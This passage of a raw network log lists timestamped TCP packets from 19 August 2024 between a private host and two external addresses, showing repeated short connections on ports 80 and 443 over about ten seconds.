Aug 19, 2024 06:06:40.068850040 CEST	80	49921	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.068933964 CEST	49921	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.076442957 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.076493025 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.076551914 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.076932907 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.076948881 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.181999922 CEST	49921	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.181998968 CEST	49923	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.186908007 CEST	80	49923	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.187138081 CEST	80	49921	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.187251091 CEST	49923	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.187254906 CEST	49921	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.187480927 CEST	49923	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.192276955 CEST	80	49923	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.574942112 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.575012922 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.575135946 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.576152086 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.576167107 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.740303993 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.740456104 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.741014957 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.741020918 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.743366957 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.743377924 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.743417978 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:40.743427038 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:40.933339119 CEST	80	49923	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.935622931 CEST	49923	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.938524008 CEST	49923	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.938534021 CEST	49924	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.943377018 CEST	80	49924	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.943483114 CEST	49924	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.943697929 CEST	80	49923	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:40.943743944 CEST	49924	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.943821907 CEST	49923	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:40.948523045 CEST	80	49924	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:41.123712063 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.123753071 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.123935938 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.124528885 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.124542952 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.416749954 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.416810036 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.416821957 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.416857958 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.416941881 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.416985989 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.419312954 CEST	49922	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.419331074 CEST	443	49922	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.719058037 CEST	80	49924	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:41.719131947 CEST	49924	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:41.777434111 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.777489901 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.778309107 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.778321028 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.780878067 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.780889988 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.780909061 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:41.780922890 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:41.823000908 CEST	49924	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:41.823414087 CEST	49926	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:41.828140974 CEST	80	49924	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:41.828211069 CEST	80	49926	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:41.828218937 CEST	49924	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:41.828286886 CEST	49926	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:41.828505039 CEST	49926	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:41.833296061 CEST	80	49926	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:42.256500959 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.256535053 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.258738995 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.264239073 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.264254093 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.548614025 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.548681021 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.548712015 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.548831940 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.550652027 CEST	49925	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.550674915 CEST	443	49925	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.578488111 CEST	80	49926	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:42.578594923 CEST	49926	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:42.582660913 CEST	49926	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:42.583127022 CEST	49928	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:42.587837934 CEST	80	49926	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:42.587908030 CEST	80	49928	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:42.587929964 CEST	49926	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:42.588042974 CEST	49928	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:42.588393927 CEST	49928	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:42.593132019 CEST	80	49928	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:42.924097061 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.926692963 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.929471970 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.929471970 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.929482937 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.929498911 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:42.929564953 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:42.929578066 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.269560099 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.269606113 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.269664049 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.270124912 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.270139933 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.343034029 CEST	80	49928	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:43.343132973 CEST	49928	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:43.449424028 CEST	49928	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:43.449809074 CEST	49930	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:43.454669952 CEST	80	49928	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:43.454684973 CEST	80	49930	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:43.454765081 CEST	49930	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:43.454766035 CEST	49928	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:43.455065966 CEST	49930	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:43.460733891 CEST	80	49930	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:43.695183039 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.695244074 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.695261002 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.695297956 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.695305109 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.695333004 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.695396900 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.695440054 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.696924925 CEST	49927	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.696942091 CEST	443	49927	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.934024096 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.934073925 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.934897900 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.934905052 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.936878920 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.936883926 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:43.937149048 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:43.937165976 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.225720882 CEST	80	49930	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:44.228357077 CEST	49930	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:44.230448961 CEST	49930	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:44.230462074 CEST	49931	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:44.235541105 CEST	80	49931	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:44.236558914 CEST	80	49930	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:44.236603022 CEST	49931	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:44.236783028 CEST	49931	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:44.236892939 CEST	49930	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:44.241811037 CEST	80	49931	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:44.263561010 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.263612032 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.266926050 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.266926050 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.266963005 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.810445070 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.810527086 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.810686111 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.812501907 CEST	49929	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.812525034 CEST	443	49929	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.914798021 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.920583010 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.922749043 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.922749043 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.922760010 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.922780037 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.922842026 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:44.922856092 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:44.991652012 CEST	80	49931	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:44.992609024 CEST	49931	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.104155064 CEST	49931	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.108549118 CEST	49933	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.109327078 CEST	80	49931	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.112617970 CEST	49931	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.113430023 CEST	80	49933	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.113560915 CEST	49933	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.114824057 CEST	49933	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.119621038 CEST	80	49933	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.270826101 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.270869017 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.270925999 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.271313906 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.271327972 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.789067030 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.789181948 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.789208889 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.789237976 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.789252996 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.789315939 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.790543079 CEST	49932	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.790561914 CEST	443	49932	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.861574888 CEST	80	49933	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.861656904 CEST	49933	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.865298033 CEST	49933	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.865637064 CEST	49935	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.871321917 CEST	80	49933	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.871417999 CEST	49933	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.871419907 CEST	80	49935	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.871516943 CEST	49935	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.871763945 CEST	49935	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:45.877238035 CEST	80	49935	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:45.925601006 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.925681114 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.926305056 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.926314116 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.928411961 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.928428888 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:45.928478003 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:45.928497076 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.085864067 CEST	49935	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.197714090 CEST	49936	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.202821970 CEST	80	49936	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:46.206784010 CEST	49936	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.207015991 CEST	49936	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.212336063 CEST	80	49936	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:46.271848917 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.271909952 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.272469044 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.272799969 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.272826910 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.685884953 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.685946941 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.685951948 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.686018944 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.687150955 CEST	49934	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.687181950 CEST	443	49934	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.930713892 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.936625004 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.939920902 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.939933062 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.942037106 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.942037106 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:46.942054033 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.942070007 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:46.956233025 CEST	80	49936	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:46.956337929 CEST	49936	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.959065914 CEST	49936	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.960241079 CEST	49938	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.964200974 CEST	80	49936	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:46.965081930 CEST	80	49938	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:46.965184927 CEST	49936	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.965187073 CEST	49938	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.965568066 CEST	49938	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:46.970406055 CEST	80	49938	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:47.311511993 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.311567068 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.311626911 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.311969042 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.311984062 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.740905046 CEST	80	49938	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:47.740979910 CEST	49938	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:47.822144032 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.822221041 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.822241068 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.822280884 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.822316885 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.822511911 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.823396921 CEST	49937	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.823414087 CEST	443	49937	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.853614092 CEST	49938	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:47.853976011 CEST	49940	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:47.858633041 CEST	80	49938	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:47.858681917 CEST	49938	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:47.858766079 CEST	80	49940	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:47.858822107 CEST	49940	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:47.859051943 CEST	49940	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:47.863806963 CEST	80	49940	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:47.975224018 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.975383043 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.975881100 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.975894928 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.977718115 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.977726936 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:47.977749109 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:47.977757931 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:48.338553905 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:48.338604927 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:48.344604969 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:48.346952915 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:48.346971989 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:48.627059937 CEST	80	49940	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:48.627657890 CEST	49940	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:48.630120039 CEST	49940	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:48.630753040 CEST	49942	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:48.635364056 CEST	80	49940	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:48.635457993 CEST	49940	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:48.635624886 CEST	80	49942	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:48.636132002 CEST	49942	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:48.636636019 CEST	49942	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:48.642748117 CEST	80	49942	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:48.677810907 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:48.677881956 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:48.677917004 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:48.677990913 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:48.679147959 CEST	49939	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:48.679187059 CEST	443	49939	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.013649940 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.013750076 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.014297009 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.014322996 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.016182899 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.016197920 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.016263008 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.016280890 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.392143965 CEST	80	49942	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:49.392221928 CEST	49942	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:49.448134899 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.448185921 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.448242903 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.448543072 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.448558092 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.511645079 CEST	49942	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:49.512192965 CEST	49944	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:49.516839981 CEST	80	49942	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:49.516906977 CEST	49942	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:49.517044067 CEST	80	49944	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:49.517119884 CEST	49944	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:49.517307043 CEST	49944	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:49.522126913 CEST	80	49944	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:49.776504993 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.776604891 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.776664019 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.776684046 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:49.776715040 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.776765108 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.777760029 CEST	49941	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:49.777796984 CEST	443	49941	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.106867075 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.106924057 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.107558012 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.107567072 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.109745026 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.109750032 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.109842062 CEST	49943	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:50.109848976 CEST	443	49943	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:50.267601967 CEST	80	49944	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:50.268595934 CEST	49944	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:50.271399975 CEST	49945	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:50.271405935 CEST	49944	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:50.276314020 CEST	80	49945	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:50.276624918 CEST	80	49944	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:50.276628017 CEST	49945	80	192.168.2.4	185.215.113.16
